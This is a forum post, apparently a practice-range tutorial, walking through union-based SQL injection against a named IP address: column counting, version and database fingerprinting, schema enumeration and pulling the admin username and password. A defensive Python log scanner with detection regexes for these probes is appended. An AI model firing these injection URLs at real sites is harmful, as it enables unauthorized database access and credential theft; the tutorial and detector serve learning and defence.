Public Course Range, Chapter 1: SQL Injection

qop1114   ·   posted on 2020-07-29 18:16:00   ·   Issue Feedback

Basic SQL injection test

0x01 Finding the target

Finding the SQL injection point

  1. http://59.63.200.79:8003/?id=1
  2. http://59.63.200.79:8003/?id=1%20and%201=1

%20 is the URL encoding of a space

  1. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%201
  2. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%202
  3. // the page shows an error
  4. http://59.63.200.79:8003/?id=1%20and%201=1%20order%20by%203

Determining the echoed columns

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,2

0x02 Constructing SQL statements

1. Query the current database name

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,database()

2. Query the database version

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,version()

3. Query the table names in the current database

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1

4. Query the table's column information

limit 0,1: start from row 0 of the table and read only one row;

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%200,1
  2. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%201,1
  3. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,column_name%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=%27admin%27%20limit%202,1


Found that the admin table has three columns: id, username, password

5. Construct a statement to query the users

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,username%20from%20admin%20%20limit%200,1

Found only one user

Retrieve the user's password

  1. http://59.63.200.79:8003/?id=1%20and%201=2%20union%20select%201,password%20from%20admin%20%20limit%200,1

Tip me to keep me motivated~
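A defender-side complement to the probes above, added here as an example and not part of the original post: a small Python scanner that percent-decodes the query string of each request in web-server access-log lines and tags every stage of the union-based technique walked through in this post (tautology, column counting with `order by`, `union select`, `information_schema` enumeration, `database()`/`version()` fingerprinting). The log lines are constructed samples and the client address is a placeholder; decoding is repeated until stable so a double-encoded probe is normalized before matching.

```python
import re
from urllib.parse import urlsplit, unquote

# Constructed sample access-log lines (not from the original post); the client
# address is a placeholder and the targets mirror the probes in the walkthrough.
SAMPLE_LOG = """\
198.51.100.7 - - [29/Jul/2020:18:10:01 +0800] "GET /?id=1 HTTP/1.1" 200 512
198.51.100.7 - - [29/Jul/2020:18:10:02 +0800] "GET /?id=1%20and%201=1 HTTP/1.1" 200 512
198.51.100.7 - - [29/Jul/2020:18:10:03 +0800] "GET /?id=1%20and%201=1%20order%20by%203 HTTP/1.1" 500 0
198.51.100.7 - - [29/Jul/2020:18:10:04 +0800] "GET /?id=1%20and%201=2%20union%20select%201,database() HTTP/1.1" 200 498
198.51.100.7 - - [29/Jul/2020:18:10:05 +0800] "GET /?id=1%20and%201=2%20union%20select%201,table_name%20from%20information_schema.tables%20where%20table_schema=database()%20limit%200,1 HTTP/1.1" 200 501
198.51.100.7 - - [29/Jul/2020:18:10:06 +0800] "GET /?id=1%2520and%25201%253D1 HTTP/1.1" 200 512
198.51.100.7 - - [29/Jul/2020:18:10:07 +0800] "GET /?id=42 HTTP/1.1" 200 512
"""

REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Each rule corresponds to one stage of the union-based probing shown in the post.
RULES = {
    "tautology": re.compile(r"\band\s+1\s*=\s*[12]\b", re.I),
    "column-count": re.compile(r"\border\s+by\s+\d+\b", re.I),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-enum": re.compile(r"\binformation_schema\s*\.\s*(?:tables|columns)\b", re.I),
    "db-fingerprint": re.compile(r"\b(?:database|version|user)\s*\(\s*\)", re.I),
}

def normalize(query: str) -> str:
    """Percent-decode until stable (defeats double encoding), then squash whitespace."""
    prev = None
    while query != prev:
        prev, query = query, unquote(query)
    return re.sub(r"\s+", " ", query).lower()

def scan_log(text: str) -> list[dict]:
    """Return one finding per request whose decoded query string matches any rule."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        q = normalize(urlsplit(m["target"]).query)
        hits = [name for name, rx in RULES.items() if rx.search(q)]
        if hits:
            findings.append({"line": lineno, "status": int(m["status"]), "rules": hits, "query": q})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f['line']} status {f['status']} {','.join(f['rules'])}: {f['query']}")
```

The status code is kept in each finding because, as the post shows, an `order by` probe past the real column count produces a server error, so a 500 right after a flagged request is a useful corroborating signal.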

0 replies   |  last activity 2020-7-29 | 1829 views